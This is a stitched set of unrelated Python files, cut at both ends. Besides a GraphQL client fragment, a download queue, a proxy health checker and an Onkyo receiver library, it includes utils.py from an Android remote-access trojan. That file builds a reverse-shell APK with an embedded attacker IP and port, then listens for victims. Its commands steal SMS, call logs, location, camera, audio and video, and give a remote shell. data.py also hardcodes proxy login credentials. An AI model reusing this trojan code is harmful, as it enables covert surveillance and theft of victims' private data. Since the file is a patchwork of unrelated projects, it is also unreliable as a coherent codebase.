f' {max_reconnections - self.failed_connection_attempts} times...')
self._reconnect()
_cc, _id = self.prepare_subscribe(
query, variables, headers, callback, authorization)
continue
print(
f'Did not reconnect successfully after {max_reconnections} attempts')
self._st_id = threading.Thread(target=subs, args=(_cc, _id))
self._st_id.start()
return _id
def _stop_subscribe(self, _id):
self._subscription_running = False
self._stop(_id)
def close(self):
"""
Handles close
"""
self._conn.close()
def pause(self):
"""
Handles pause
"""
self._paused = True
def unpause(self):
"""
Handles unpause
"""
self._paused = False
def get_lifetime(self):
"""
Return the lifetime
"""
return (datetime.now() - self._created_at).seconds
def reset_timeout(self):
"""
Resets the timeout
"""
self._reconnect()
def gen_id(size=6, chars=string.ascii_letters + string.digits):
"""
Generate random alphanumeric id
Parameters
----------
- size: length of the id
- chars: chars used to generate the id
"""
return ''.join(random.choice(chars) for _ in range(size))
|
utils.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import sys
import os
import base64
import time
import binascii
import select
import pathlib
import platform
import re
from subprocess import PIPE, run
from colorama import Fore, Style,init
from pyngrok import ngrok
import socket
import threading
import itertools
import queue
banner = """\033[1m\033[91m
_________-----_____
_____------ __ ----_
___---- ___------ \
----________ ---- \
-----__ | _____)
__- / \
_______----- ___-- \ /)\
------_______ ---____ \__/ /
-----__ \ -- _ /\
--__--__ \_____/ \_/\
----| / |
| |___________|
| | ((_(_)| )_)
| \_((_(_)|/(_)
\ (
\_____________)
\033[93m- By Retr0
"""
pattern = '\"(\\d+\\.\\d+).*\"'
def stdOutput(type_=None):
if type_=="error":col="31m";str="ERROR"
if type_=="warning":col="33m";str="WARNING"
if type_=="success":col="32m";str="SUCCESS"
if type_ == "info":return "\033[1m[\033[33m\033[0m\033[1m\033[33mINFO\033[0m\033[1m] "
message = "\033[1m[\033[31m\033[0m\033[1m\033["+col+str+"\033[0m\033[1m]\033[0m "
return message
def animate(message):
chars = "/—\\|"
for char in chars:
sys.stdout.write("\r"+stdOutput("info")+"\033[1m"+message+"\033[31m"+char+"\033[0m")
time.sleep(.1)
sys.stdout.flush()
def clearDirec():
if(platform.system() == 'Windows'):
clear = lambda: os.system('cls')
direc = "\\"
init(convert=True)
else:
clear = lambda: os.system('clear')
direc = "/"
return clear,direc
clear,direc = clearDirec()
if not os.path.isdir(os.getcwd()+direc+"Dumps"):
os.makedirs("Dumps")
def is_valid_ip(ip):
m = re.match(r"^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$", ip)
return bool(m) and all(map(lambda n: 0 <= int(n) <= 255, m.groups()))
def is_valid_port(port):
i = 1 if port.isdigit() and len(port)>1 else 0
return i
def execute(command):
return run(command, stdout=PIPE, stderr=PIPE, universal_newlines=True, shell=True)
def executeCMD(command,queue):
result = run(command, stdout=PIPE, stderr=PIPE, universal_newlines=True, shell=True)
queue.put(result)
return result
def getpwd(name):
return os.getcwd()+direc+name;
def help():
helper="""
Usage:
deviceInfo --> returns basic info of the device
camList --> returns cameraID
takepic [cameraID] --> Takes picture from camera
startVideo [cameraID] --> starts recording the video
stopVideo --> stop recording the video and return the video file
startAudio --> starts recording the audio
stopAudio --> stop recording the audio
getSMS [inbox|sent] --> returns inbox sms or sent sms in a file
getCallLogs --> returns call logs in a file
shell --> starts a interactive shell of the device
vibrate [number_of_times] --> vibrate the device number of time
getLocation --> return the current location of the device
getIP --> returns the ip of the device
getSimDetails --> returns the details of all sim of the device
clear --> clears the screen
getClipData --> return the current saved text from the clipboard
getMACAddress --> returns the mac address of the device
exit --> exit the interpreter
"""
print(helper)
def getImage(client):
print(stdOutput("info")+"\033[0mTaking Image")
timestr = time.strftime("%Y%m%d-%H%M%S")
flag=0
filename ="Dumps"+direc+"Image_"+timestr+'.jpg'
imageBuffer=recvall(client)
imageBuffer = imageBuffer.strip().replace("END123","").strip()
if imageBuffer=="":
print(stdOutput("error")+"Unable to connect to the Camera\n")
return
with open(filename,'wb') as img:
try:
imgdata = base64.b64decode(imageBuffer)
img.write(imgdata)
print(stdOutput("success")+"Succesfully Saved in \033[1m\033[32m"+getpwd(filename)+"\n")
except binascii.Error as e:
flag=1
print(stdOutput("error")+"Not able to decode the Image\n")
if flag == 1:
os.remove(filename)
def readSMS(client,data):
print(stdOutput("info")+"\033[0mGetting "+data+" SMS")
msg = "start"
timestr = time.strftime("%Y%m%d-%H%M%S")
filename = "Dumps"+direc+data+"_"+timestr+'.txt'
flag =0
with open(filename, 'w',errors="ignore", encoding="utf-8") as txt:
msg = recvall(client)
try:
txt.write(msg)
print(stdOutput("success")+"Succesfully Saved in \033[1m\033[32m"+getpwd(filename)+"\n")
except UnicodeDecodeError:
flag = 1
print(stdOutput("error")+"Unable to decode the SMS\n")
if flag == 1:
os.remove(filename)
def getFile(filename,ext,data):
fileData = "Dumps"+direc+filename+"."+ext
flag=0
with open(fileData, 'wb') as file:
try:
rawFile = base64.b64decode(data)
file.write(rawFile)
print(stdOutput("success")+"Succesfully Downloaded in \033[1m\033[32m"+getpwd(fileData)+"\n")
except binascii.Error:
flag=1
print(stdOutput("error")+"Not able to decode the Audio File")
if flag == 1:
os.remove(filename)
def putFile(filename):
data = open(filename, "rb").read()
encoded = base64.b64encode(data)
return encoded
def shell(client):
msg = "start"
command = "ad"
while True:
msg = recvallShell(client)
if "getFile" in msg:
msg=" "
msg1 = recvall(client)
msg1 = msg1.replace("\nEND123\n","")
filedata = msg1.split("|_|")
getFile(filedata[0],filedata[1],filedata[2])
if "putFile" in msg:
msg=" "
sendingData=""
filename = command.split(" ")[1].strip()
file = pathlib.Path(filename)
if file.exists():
encoded_data = putFile(filename).decode("UTF-8")
filedata = filename.split(".")
sendingData+="putFile"+"<"+filedata[0]+"<"+filedata[1]+"<"+encoded_data+"END123\n"
client.send(sendingData.encode("UTF-8"))
print(stdOutput("success")+f"Succesfully Uploaded the file \033[32m{filedata[0]+'.'+filedata[1]} in /sdcard/temp/")
else:
print(stdOutput("error")+"File not exist")
if "Exiting" in msg:
print("\033[1m\033[33m----------Exiting Shell----------\n")
return
msg = msg.split("\n")
for i in msg[:-2]:
print(i)
print(" ")
command = input("\033[1m\033[36mandroid@shell:~$\033[0m \033[1m")
command = command+"\n"
if command.strip() == "clear":
client.send("test\n".encode("UTF-8"))
clear()
else:
client.send(command.encode("UTF-8"))
def getLocation(sock):
msg = "start"
while True:
msg = recvall(sock)
msg = msg.split("\n")
for i in msg[:-2]:
print(i)
if("END123" in msg):
return
print(" ")
def recvall(sock):
buff=""
data = ""
while "END123" not in data:
data = sock.recv(4096).decode("UTF-8","ignore")
buff+=data
return buff
def recvallShell(sock):
buff=""
data = ""
ready = select.select([sock], [], [], 3)
while "END123" not in data:
if ready[0]:
data = sock.recv(4096).decode("UTF-8","ignore")
buff+=data
else:
buff="bogus"
return buff
return buff
def stopAudio(client):
print(stdOutput("info")+"\033[0mDownloading Audio")
timestr = time.strftime("%Y%m%d-%H%M%S")
data= ""
flag =0
data=recvall(client)
data = data.strip().replace("END123","").strip()
filename = "Dumps"+direc+"Audio_"+timestr+".mp4"
with open(filename, 'wb') as audio:
try:
audioData = base64.b64decode(data)
audio.write(audioData)
print(stdOutput("success")+"Succesfully Saved in \033[1m\033[32m"+getpwd(filename))
except binascii.Error:
flag=1
print(stdOutput("error")+"Not able to decode the Audio File")
print(" ")
if flag == 1:
os.remove(filename)
def stopVideo(client):
print(stdOutput("info")+"\033[0mDownloading Video")
timestr = time.strftime("%Y%m%d-%H%M%S")
data= ""
flag=0
data=recvall(client)
data = data.strip().replace("END123","").strip()
filename = "Dumps"+direc+"Video_"+timestr+'.mp4'
with open(filename, 'wb') as video:
try:
videoData = base64.b64decode(data)
video.write(videoData)
print(stdOutput("success")+"Succesfully Saved in \033[1m\033[32m"+getpwd(filename))
except binascii.Error:
flag = 1
print(stdOutput("error")+"Not able to decode the Video File\n")
if flag == 1:
os.remove("Video_"+timestr+'.mp4')
def callLogs(client):
print(stdOutput("info")+"\033[0mGetting Call Logs")
msg = "start"
timestr = time.strftime("%Y%m%d-%H%M%S")
msg = recvall(client)
filename = "Dumps"+direc+"Call_Logs_"+timestr+'.txt'
if "No call logs" in msg:
msg.split("\n")
print(msg.replace("END123","").strip())
print(" ")
else:
with open(filename, 'w',errors="ignore", encoding="utf-8") as txt:
txt.write(msg)
txt.close()
print(stdOutput("success")+"Succesfully Saved in \033[1m\033[32m"+getpwd(filename)+"\033[0m")
if not os.path.getsize(filename):
os.remove(filename)
def get_shell(ip,port):
soc = socket.socket()
soc = socket.socket(type=socket.SOCK_STREAM)
try:
soc.bind((ip, int(port)))
except Exception as e:
print(stdOutput("error")+"\033[1m %s"%e);exit()
soc.listen(2)
print(banner)
while True:
que = queue.Queue()
t = threading.Thread(target=connection_checker,args=[soc,que])
t.daemon = True
t.start()
while t.is_alive(): animate("Waiting for Connections ")
t.join()
conn, addr = que.get()
clear()
print("\033[1m\033[33mGot connection from \033[31m"+"".join(str(addr))+"\033[0m")
print(" ")
while True:
msg = conn.recv(4024).decode("UTF-8")
if(msg.strip() == "IMAGE"):
getImage(conn)
elif("readSMS" in msg.strip()):
content = msg.strip().split(" ")
data = content[1]
readSMS(conn,data)
elif(msg.strip() == "SHELL"):
shell(conn)
elif(msg.strip() == "getLocation"):
getLocation(conn)
elif(msg.strip() == "stopVideo123"):
stopVideo(conn)
elif(msg.strip() == "stopAudio"):
stopAudio(conn)
elif(msg.strip() == "callLogs"):
callLogs(conn)
elif(msg.strip() == "help"):
help()
else:
print(stdOutput("error")+msg) if "Unknown Command" in msg else print("\033[1m"+msg) if "Hello there" in msg else print(msg)
message_to_send = input("\033[1m\033[36mInterpreter:/> \033[0m")+"\n"
conn.send(message_to_send.encode("UTF-8"))
if message_to_send.strip() == "exit":
print(" ")
print("\033[1m\033[32m\t (∗ ・‿・)ノ゛\033[0m")
sys.exit()
if(message_to_send.strip() == "clear"):clear()
def connection_checker(socket,queue):
conn, addr = socket.accept()
queue.put([conn,addr])
return conn,addr
def build(ip,port,output,ngrok=False,ng=None,icon=None):
editor = "Compiled_apk"+direc+"smali"+direc+"com"+direc+"example"+direc+"reverseshell2"+direc+"config.smali"
try:
file = open(editor,"r").readlines()
#Very much uncertaninity but cant think any other way to do it xD
file[18]=file[18][:21]+"\""+ip+"\""+"\n"
file[23]=file[23][:21]+"\""+port+"\""+"\n"
file[28]=file[28][:15]+" 0x0"+"\n" if icon else file[28][:15]+" 0x1"+"\n"
str_file="".join([str(elem) for elem in file])
open(editor,"w").write(str_file)
except Exception as e:
print(e)
sys.exit()
java_version = execute("java -version")
version_no = re.search(pattern, java_version.stderr).groups()[0]
if java_version.stderr == "":print(stdOutput("error")+"Java Not Installed");exit()
if float(version_no) < 1.8: print(stdOutput("error")+"Java 8 is required ");exit()
print(stdOutput("info")+"\033[0mGenerating APK")
outFileName = output if output else "lewd.apk"
que = queue.Queue()
t = threading.Thread(target=executeCMD,args=["java -jar Jar_utils/apktool.jar b Compiled_apk -o "+outFileName,que],)
t.start()
while t.is_alive(): animate("Building APK ")
t.join()
print(" ")
resOut = que.get()
if not resOut.returncode:
print(stdOutput("success")+"Successfully apk built in \033[1m\033[32m"+getpwd(outFileName)+"\033[0m")
print(stdOutput("info")+"\033[0mSigning the apk")
t = threading.Thread(target=executeCMD,args=["java -jar Jar_utils/sign.jar "+outFileName+" --override",que],)
t.start()
while t.is_alive(): animate("Signing Apk ")
t.join()
print(" ")
resOut = que.get()
if not resOut.returncode:
print(stdOutput("success")+"Successfully signed the apk \033[1m\033[32m"+outFileName+"\033[0m")
if ngrok:
clear()
get_shell("0.0.0.0",8000) if not ng else get_shell("0.0.0.0",ng)
print(" ")
else:
print("\r"+resOut.stderr)
print(stdOutput("error")+"Signing Failed")
else:
print("\r"+resOut.stderr)
print(stdOutput("error")+"Building Failed")
|
download.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Background download management."""
from __future__ import print_function, unicode_literals, absolute_import
import os, shutil, tempfile
from threading import Thread, Lock
try: # Python 2
# pylint:disable=import-error
from urllib2 import urlopen, Request, URLError
except ImportError: # Python 3
# pylint:disable=import-error, no-name-in-module
from urllib.request import urlopen, Request
from urllib.error import URLError
from .lnp import VERSION
from . import log
__download_queues = {}
def download_str(url, **kwargs):
"""Instantly download a file from <url> and return its contents. Failed
downloads return None. NOTE: This is a blocking method. Use a download queue
for non-blocking downloads.
Keyword arguments:
encoding
Used to decode the data to text. Defaults to UTF-8.
timeout
Timeout used for the URL request, in seconds. Defaults to 3.
<encoding> is not provided, UTF-8 is used.
"""
# pylint: disable=bare-except
try:
req = Request(url, headers={'User-Agent':'PyLNP/'+VERSION})
return urlopen(
req, timeout=kwargs.get('timeout', 3)).read().decode(
kwargs.get('encoding', 'utf-8'))
except URLError as ex:
log.e('Error downloading '+url+': '+ex.reason)
except:
log.e('Error downloading '+url)
return None
def download(queue, url, destination, end_callback=None, **kwargs):
"""Adds a download to the specified queue."""
return get_queue(queue).add(url, destination, end_callback, **kwargs)
def queue_empty(queue):
"""Returns True if the specified queue does not exist, or is empty;
otherwise False."""
return queue not in __download_queues or __download_queues[queue].empty()
def get_queue(queue):
"""Returns the specified queue object, creating a new queue if necessary."""
__download_queues.setdefault(queue, DownloadQueue(queue))
return __download_queues[queue]
# pylint:disable=too-many-instance-attributes
class DownloadQueue(object):
"""Queue used for downloading files."""
def __init__(self, name):
self.name = name
self.queue = []
self.on_start_queue = []
self.on_begin_download = []
self.on_progress = []
self.on_end_download = []
self.on_end_queue = []
self.thread = None
self.lock = Lock()
if name == 'immediate':
def _immediate_progress(_, url, progress, total):
if total != -1:
msg = "Downloading %s... (%s/%s)" % (
os.path.basename(url), progress, total)
else:
msg = ("Downloading %s... (%s bytes downloaded)" % (
os.path.basename(url), progress))
print("\r%s" % msg, end='')
self.register_progress(_immediate_progress)
def add(self, url, target, end_callback):
"""Adds a download to the queue.
Params:
url
The URL to download.
target
The target path for the download.
end_callback
A function(url, filename, success) which is called
when the download finishes."""
with self.lock:
if url not in [q[0] for q in self.queue]:
self.queue.append((url, target, end_callback))
log.d(self.name+': queueing '+url+' for download to '+target)
else:
log.d(self.name+': skipping add of '+url+', already in queue')
if not self.thread and self.name != 'immediate':
log.d('Download queue '+self.name+' not running, starting it')
self.thread = t = Thread(target=self.__process_queue)
t.daemon = True
t.start()
if self.name == 'immediate':
log.i('Downloading immediately...')
self.__process_queue()
def empty(self):
"""Returns True if the queue is empty, otherwise False."""
return len(self.queue) == 0
def register_start_queue(self, func):
"""Registers a function func(queue_name) to be called when the queue is
started. If False is returned by any function, the queue is cleared."""
self.on_start_queue.append(func)
def unregister_start_queue(self, func):
"""Unregisters a function func from being called when the queue is
started."""
self.on_start_queue.remove(func)
def register_begin_download(self, func):
"""Registers a function func(queue_name, url) to be called when a
download is started."""
self.on_begin_download.append(func)
def unregister_begin_download(self, func):
"""Unregisters a function func from being called when a download is
started."""
self.on_begin_download.remove(func)
def register_progress(self, func):
"""Registers a function func(queue_name, url, downloaded, total_size) to
be called for download progress reports.
If total size is unknown, None will be sent."""
self.on_progress.append(func)
def unregister_progress(self, func):
"""Unregisters a function from being called for download progress
reports."""
self.on_progress.remove(func)
def register_end_download(self, func):
"""Registers a function func(queue_name, url, filename, success) to be
called when a download is finished."""
self.on_end_download.append(func)
def unregister_end_download(self, func):
"""Unregisters a function func from being called when a download is
finished."""
self.on_end_download.remove(func)
def register_end_queue(self, func):
"""Registers a function func(queue_name) to be called when the
queue is emptied."""
self.on_end_queue.append(func)
def unregister_end_queue(self, func):
"""Unregisters a function func from being called when the queue is
emptied."""
self.on_end_queue.remove(func)
def __process_callbacks(self, callbacks, *args):
"""Calls the provided set of callback functions with <args>."""
results = []
for c in callbacks:
# pylint: disable=bare-except
try:
results.append(c(self.name, *args))
except:
results.append(None)
return results
def __process_queue(self):
"""Processes the download queue."""
# pylint: disable=bare-except
if False in self.__process_callbacks(self.on_start_queue):
with self.lock:
self.queue = []
self.thread = None
return
while True:
with self.lock:
if self.empty():
self.thread = None
break
url, target, end_callback = self.queue[0]
log.d(self.name+': About to download '+url+' to '+target)
self.__process_callbacks(self.on_begin_download, url, target)
dirname = os.path.dirname(target)
if not os.path.isdir(dirname):
os.makedirs(dirname)
outhandle, outpath = tempfile.mkstemp(dir=dirname)
outfile = os.fdopen(outhandle, 'wb')
try:
req = Request(url, headers={'User-Agent':'PyLNP/'+VERSION})
response = urlopen(req, timeout=5)
data = 0
while True:
chunk = response.read(8192)
if not chunk:
break
total = response.info().get('Content-Length')
data += len(chunk)
outfile.write(chunk)
self.__process_callbacks(self.on_progress, url, data, total)
except:
outfile.close()
os.remove(outpath)
log.e(self.name+': Error downloading ' + url, stack=True)
self.__process_callbacks(
self.on_end_download, url, target, False)
if end_callback:
end_callback(url, target, False)
else:
outfile.close()
shutil.move(outpath, target)
log.d(self.name+': Finished downloading '+url)
self.__process_callbacks(
self.on_end_download, url, target, True)
if end_callback:
end_callback(url, target, True)
with self.lock:
self.queue.pop(0)
self.__process_callbacks(self.on_end_queue)
|
data.py
|
from panel.api.router.templated import nodeRegister
from panel.config.RootData import RootData
import time
import requests
import threading
class nodeData():
def __init__(self) -> None:
self.nodeList = {}
self.readFile()
self.healthCheckStart()
pass
def healthCheckStart(self):
nodeCheck = threading.Thread(target=self.healthCheck)
nodeCheck.name = "Health Check Thread"
nodeCheck.start()
def healthCheck(self) -> None:
while True:
time.sleep(30)
for i,key in enumerate(self.nodeList):
node = self.nodeList[key]
nodeCheck = threading.Thread(target=self.nodeCheck,args=(node,))
nodeCheck.name = str(f"nodecheck : {node.ID}")
nodeCheck.start()
def nodeCheck(self,node:nodeRegister) ->None:
if node.publicAddress is None or node.publicAddress == "":
self.nodeList[node.ID].status = 0
if node.port is None or node.port == "":
self.nodeList[node.ID].status = 0
ulr = f"https://arknights:ghYDmaf00HiP@{node.publicAddress}:{node.port}"
proxies = {
'https': ulr
}
try:
r = requests.get('https://www.google.com', proxies=proxies)
self.nodeList[node.ID].lastUpdate = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
if r.status_code == 200:
self.nodeList[node.ID].status = 0
if r.status_code != 200:
self.nodeList[node.ID].status = 1
except Exception as e:
self.nodeList[node.ID].lastUpdate = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
self.nodeList[node.ID].status = 1
def readFile(self):
RootData.load(path='panel/config/Root.DataStore')
self.nodeList = RootData.get("nodeList")
if self.nodeList == None:
self.nodeList = {}
RootData.set("nodeList", self.nodeList)
RootData.dump(save_path='panel/config/Root.DataStore')
return
def saveFile(self):
RootData.set("nodeList", self.nodeList)
RootData.dump(save_path='panel/config/Root.DataStore')
def setIndex(self,node : nodeRegister):
index = 0
indexList = [key for key in self.nodeList.keys()]
if node.ID is not None:
return
if node.ID is None:
while True:
if index in indexList:
index+=1
continue
node.ID = index
return
def nodeApend(self,node : nodeRegister) ->None:
self.setIndex(node)
self.nodeList[node.ID] = node
self.saveFile()
return node
def getNodeByIndex(self,index):
if index in self.nodeList.keys():
return self.nodeList[index]
return None
def delNodeByIndex(self,index):
if index in self.nodeList.keys():
self.nodeList.pop(index)
self.saveFile()
nodedata = nodeData()
|
core.py
|
import re
import struct
import time
import socket, select
import threading
try:
import queue as queue
except ImportError:
import Queue as queue
import netifaces
from collections import namedtuple
from . import commands
from .utils import ValueRange
class ISCPMessage(object):
"""Deals with formatting and parsing data wrapped in an ISCP
containers. The docs say:
ISCP (Integra Serial Control Protocol) consists of three
command characters and parameter character(s) of variable
length.
It seems this was the original protocol used for communicating
via a serial cable.
"""
def __init__(self, data):
self.data = data
def __str__(self):
# ! = start character
# 1 = destination unit type, 1 means receiver
# End character may be CR, LF or CR+LF, according to doc
return '!1{}\r'.format(self.data)
@classmethod
def parse(self, data):
EOF = '\x1a'
TERMINATORS = ['\n', '\r']
assert data[:2] == '!1'
eof_offset = -1
# EOF can be followed by CR/LF/CR+LF
if data[eof_offset] in TERMINATORS:
eof_offset -= 1
if data[eof_offset] in TERMINATORS:
eof_offset -= 1
assert data[eof_offset] == EOF
return data[2:eof_offset]
class eISCPPacket(object):
"""For communicating over Ethernet, traditional ISCP messages are
wrapped inside an eISCP package.
"""
header = namedtuple('header', (
'magic, header_size, data_size, version, reserved'))
def __init__(self, iscp_message):
iscp_message = str(iscp_message)
# We attach data separately, because Python's struct module does
# not support variable length strings,
header = struct.pack(
'! 4s I I b 3s',
b'ISCP', # magic
16, # header size (16 bytes)
len(iscp_message), # data size
0x01, # version
b'\x00\x00\x00' #reserved
)
self._bytes = header + iscp_message.encode('utf-8')
# __new__, string subclass?
def __str__(self):
return self._bytes.decode('utf-8')
def get_raw(self):
return self._bytes
@classmethod
def parse(cls, bytes):
"""Parse the eISCP package given by ``bytes``.
"""
h = cls.parse_header(bytes[:16])
data = bytes[h.header_size:h.header_size + h.data_size].decode()
assert len(data) == h.data_size
return data
@classmethod
def parse_header(self, bytes):
"""Parse the header of an eISCP package.
This is useful when reading data in a streaming fashion,
because you can subsequently know the number of bytes to
expect in the packet.
"""
# A header is always 16 bytes in length
assert len(bytes) == 16
# Parse the header
magic, header_size, data_size, version, reserved = \
struct.unpack('! 4s I I b 3s', bytes)
magic = magic.decode()
reserved = reserved.decode()
# Strangly, the header contains a header_size field.
assert magic == 'ISCP'
assert header_size == 16
return eISCPPacket.header(
magic, header_size, data_size, version, reserved)
def command_to_packet(command):
"""Convert an ascii command like (PVR00) to the binary data we
need to send to the receiver.
"""
return eISCPPacket(ISCPMessage(command)).get_raw()
def normalize_command(command):
"""Ensures that various ways to refer to a command can be used."""
command = command.lower()
command = command.replace('_', ' ')
command = command.replace('-', ' ')
return command
def command_to_iscp(command, arguments=None, zone=None):
"""Transform the given given high-level command to a
low-level ISCP message.
Raises :class:`ValueError` if `command` is not valid.
This exposes a system of human-readable, "pretty"
commands, which is organized into three parts: the zone, the
command, and arguments. For example::
command('power', 'on')
command('power', 'on', zone='main')
command('volume', 66, zone='zone2')
As you can see, if no zone is given, the main zone is assumed.
Instead of passing three different parameters, you may put the
whole thing in a single string, which is helpful when taking
input from users::
command('power on')
command('zone2 volume 66')
To further simplify things, for example when taking user input
from a command line, where whitespace needs escaping, the
following is also supported:
command('power=on')
command('zone2.volume=66')
"""
default_zone = 'main'
command_sep = r'[. ]'
norm = lambda s: s.strip().lower()
# If parts are not explicitly given, parse the command
if arguments is None and zone is None:
# Separating command and args with colon allows multiple args
if ':' in command or '=' in command:
base, arguments = re.split(r'[:=]', command, 1)
parts = [norm(c) for c in re.split(command_sep, base)]
if len(parts) == 2:
zone, command = parts
else:
zone = default_zone
command = parts[0]
# Split arguments by comma or space
arguments = [norm(a) for a in re.split(r'[ ,]', arguments)]
else:
# Split command part by space or dot
parts = [norm(c) for c in re.split(command_sep, command)]
if len(parts) >= 3:
zone, command = parts[:2]
arguments = parts[3:]
elif len(parts) == 2:
zone = default_zone
command = parts[0]
arguments = parts[1:]
else:
raise ValueError('Need at least command and argument')
# Find the command in our database, resolve to internal eISCP command
group = commands.ZONE_MAPPINGS.get(zone, zone)
if not zone in commands.COMMANDS:
raise ValueError('"{}" is not a valid zone'.format(zone))
prefix = commands.COMMAND_MAPPINGS[group].get(command, command)
if not prefix in commands.COMMANDS[group]:
raise ValueError('"{}" is not a valid command in zone "{}"'.format(
command, zone))
# Resolve the argument to the command. This is a bit more involved,
# because some commands support ranges (volume) or patterns
# (setting tuning frequency). In some cases, we might imagine
# providing the user an API with multiple arguments (TODO: not
# currently supported).
if type(arguments) is list:
argument = arguments[0]
else:
argument = arguments
# 1. Consider if there is a alias, e.g. level-up for UP.
try:
value = commands.VALUE_MAPPINGS[group][prefix][argument]
except KeyError:
# 2. See if we can match a range or pattern
for possible_arg in commands.VALUE_MAPPINGS[group][prefix]:
if type(argument) is int or (type(argument) is str and argument.lstrip("-").isdigit() is True):
if isinstance(possible_arg, ValueRange):
if int(argument) in possible_arg:
# We need to send the format "FF", hex() gives us 0xff
value = hex(int(argument))[2:].zfill(2).upper()
if prefix == 'SWL' or prefix == 'CTL':
if value == '00':
value = '0' + value
elif value[0] != 'X':
value = '+' + value
elif value[0] == 'X':
if len(value) == 2:
value = '-' + '0' + value[1:]
value = '-' + value[1:]
break
# TODO: patterns not yet supported
else:
raise ValueError('"{}" is not a valid argument for command '
'"{}" in zone "{}"'.format(argument, command, zone))
return '{}{}'.format(prefix, value)
def iscp_to_command(iscp_message):
for zone, zone_cmds in commands.COMMANDS.items():
# For now, ISCP commands are always three characters, which
# makes this easy.
command, args = iscp_message[:3], iscp_message[3:]
if command in zone_cmds:
if args in zone_cmds[command]['values']:
return zone_cmds[command]['name'], \
zone_cmds[command]['values'][args]['name']
else:
match = re.match('[+-]?[0-9a-f]+$', args, re.IGNORECASE)
if match:
return zone_cmds[command]['name'], \
int(args, 16)
else:
return zone_cmds[command]['name'], args
else:
raise ValueError(
'Cannot convert ISCP message to command: {}'.format(iscp_message))
def filter_for_message(getter_func, msg):
"""Helper that calls ``getter_func`` until a matching message
is found, or the timeout occurs. Matching means the same commands
group, i.e. for sent message MVLUP we would accept MVL13
in response."""
start = time.time()
while True:
candidate = getter_func(0.05)
# It seems ISCP commands are always three characters.
if candidate and candidate[:3] == msg[:3]:
return candidate
# exception for HDMI-CEC commands (CTV) since they don't provide any response/confirmation
if "CTV" in msg[:3]:
return msg
# The protocol docs claim that a response should arrive
# within *50ms or the communication has failed*. In my tests,
# however, the interval needed to be at least 200ms before
# I managed to see any response, and only after 300ms
# reproducably, so use a generous timeout.
if time.time() - start > 5.0:
raise ValueError('Timeout waiting for response.')
def parse_info(data):
response = eISCPPacket.parse(data)
# Return string looks something like this:
# !1ECNTX-NR609/60128/DX
info = re.match(r'''
!
(?P<device_category>\d)
ECN
(?P<model_name>[^/]*)/
(?P<iscp_port>\d{5})/
(?P<area_code>\w{2})/
(?P<identifier>.{0,12})
''', response.strip(), re.VERBOSE).groupdict()
return info
class eISCP(object):
"""Implements the eISCP interface to Onkyo receivers.
This uses a blocking interface. The remote end will regularily
send unsolicited status updates. You need to manually call
``get_message`` to query those.
You may want to look at the :meth:`Receiver` class instead, which
uses a background thread.
"""
ONKYO_PORT = 60128
CONNECT_TIMEOUT = 5
@classmethod
def discover(cls, timeout=5, clazz=None):
"""Try to find ISCP devices on network.
Waits for ``timeout`` seconds, then returns all devices found,
in form of a list of dicts.
"""
onkyo_magic = eISCPPacket('!xECNQSTN').get_raw()
pioneer_magic = eISCPPacket('!pECNQSTN').get_raw()
# Since due to interface aliasing we may see the same Onkyo device
# multiple times, we build the list as a dict keyed by the
# unique identifier code
found_receivers = {}
# We do this on all network interfaces
# which have an AF_INET address and broadcast address
for interface in netifaces.interfaces():
ifaddrs=netifaces.ifaddresses(interface)
if not netifaces.AF_INET in ifaddrs:
continue
for ifaddr in ifaddrs[netifaces.AF_INET]:
if not "addr" in ifaddr or not "broadcast" in ifaddr:
continue
# Broadcast magic
sock = socket.socket(
socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setblocking(0) # So we can use select()
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
sock.bind((ifaddr["addr"], 0))
sock.sendto(onkyo_magic, (ifaddr["broadcast"], eISCP.ONKYO_PORT))
sock.sendto(pioneer_magic, (ifaddr["broadcast"], eISCP.ONKYO_PORT))
while True:
ready = select.select([sock], [], [], timeout)
if not ready[0]:
break
data, addr = sock.recvfrom(1024)
info = parse_info(data)
# Give the user a ready-made receiver instance. It will only
# connect on demand, when actually used.
receiver = (clazz or eISCP)(addr[0], int(info['iscp_port']))
receiver.info = info
found_receivers[info["identifier"]]=receiver
sock.close()
return list(found_receivers.values())
def __init__(self, host, port=60128):
self.host = host
self.port = port
self._info = None
self.command_socket = None
@property
def model_name(self):
if self.info and self.info.get('model_name'):
return self.info['model_name']
else:
return 'unknown-model'
@property
def identifier(self):
if self.info and self.info.get('identifier'):
return self.info['identifier']
else:
return 'no-id'
def __repr__(self):
if self.info and self.info.get('model_name'):
model = self.info['model_name']
else:
model = 'unknown'
string = "<{}({}) {}:{}>".format(
self.__class__.__name__, model, self.host, self.port)
return string
@property
def info(self):
if not self._info:
sock = socket.socket(
socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setblocking(0)
sock.bind(('0.0.0.0', 0))
sock.sendto(eISCPPacket('!xECNQSTN').get_raw(), (self.host, self.port))
ready = select.select([sock], [], [], 0.1)
if ready[0]:
data = sock.recv(1024)
self._info = parse_info(data)
sock.close()
return self._info
@info.setter
def info(self, value):
self._info = value
def _ensure_socket_connected(self):
if self.command_socket is None:
self.command_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.command_socket.settimeout(self.CONNECT_TIMEOUT)
self.command_socket.connect((self.host, self.port))
self.command_socket.setblocking(0)
def disconnect(self):
try:
self.command_socket.close()
except:
pass
self.command_socket = None
def __enter__(self):
self._ensure_socket_connected()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.disconnect()
def send(self, iscp_message):
"""Send a low-level ISCP message, like ``MVL50``.
This does not return anything, nor does it wait for a response
from the receiver. You can query responses via :meth:`get`,
or use :meth:`raw` to send a message and waiting for one.
"""
self._ensure_socket_connected()
self.command_socket.send(command_to_packet(iscp_message))
def get(self, timeout=0.1):
"""Return the next message sent by the receiver, or, after
``timeout`` has passed, return ``None``.
"""
self._ensure_socket_connected()
ready = select.select([self.command_socket], [], [], timeout or 0)
if ready[0]:
header_bytes = self.command_socket.recv(16)
header = eISCPPacket.parse_header(header_bytes)
body = b''
while len(body) < header.data_size:
ready = select.select([self.command_socket], [], [], timeout or 0)
if not ready[0]:
return None
body += self.command_socket.recv(header.data_size - len(body))
